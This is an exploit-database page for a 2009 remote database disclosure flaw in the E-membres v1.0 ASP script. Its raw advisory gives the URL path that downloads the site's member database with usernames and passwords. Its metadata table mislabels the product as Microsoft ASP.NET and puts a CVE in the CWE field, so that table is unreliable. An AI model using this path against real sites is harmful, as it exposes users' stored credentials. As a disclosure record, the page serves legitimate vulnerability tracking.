header-logo
Suggest Exploit
vendor:
ASP.NET Web Application
by:
ViRuSMaN
8,8
CVSS
HIGH
Remote Database Disclosure
200
CWE
Product Name: ASP.NET Web Application
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: o:microsoft:asp_net_web_application
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

E-membres v1.0 Remote Database Disclosure Vulnerability

E-membres v1.0 is vulnerable to remote database disclosure. An attacker can access the database file bdEMembres.mdb which contains sensitive information such as usernames, passwords, and other user information.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] E-membres v1.0 Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ E-membres ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Elle contient la partie d administration des membres ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/db/bdEMembres.mdb


Author: ViRuSMaN <-

###########################################################################